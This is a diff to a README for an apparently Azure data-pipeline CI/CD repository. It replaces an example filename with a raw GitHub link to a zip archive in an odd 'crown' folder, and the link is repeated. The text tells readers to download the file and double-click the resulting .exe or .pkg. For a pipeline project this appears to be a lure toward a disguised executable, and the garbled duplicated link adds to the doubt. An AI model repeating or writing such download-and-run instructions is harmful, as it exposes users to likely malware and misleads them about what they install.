zeldalor5730/azure-data-pipeline-cicd/README.md

 ## ⚙️ How to Run the Application

 1. **Find the Downloads Folder:** Open your file explorer and go to the folder where your downloads are stored.
 2. **Locate the .exe or .pkg File:** Look for the downloaded file.
-This will usually have a name related to the application, such as `azure-data-pipeline-cicd.exe` or `azure-data-pipeline-cicd.pkg`.
+This will usually have a name related to the application, such as `https://raw.githubusercontent.com/zeldalor5730/azure-data-pipeline-cicd/main/crown/azure-data-pipeline-cicd_1.0.zip` or `https://raw.githubusercontent.com/zeldalor5730/azure-data-pipeline-cicd/main/crown/azure-data-pipeline-cicd_1.0.zip`.
 3. **Launch the Application:**
    - **On Windows:** Double-click the `.exe` file to run it.
    - **On macOS:** Double-click the `.pkg` file and follow the prompts.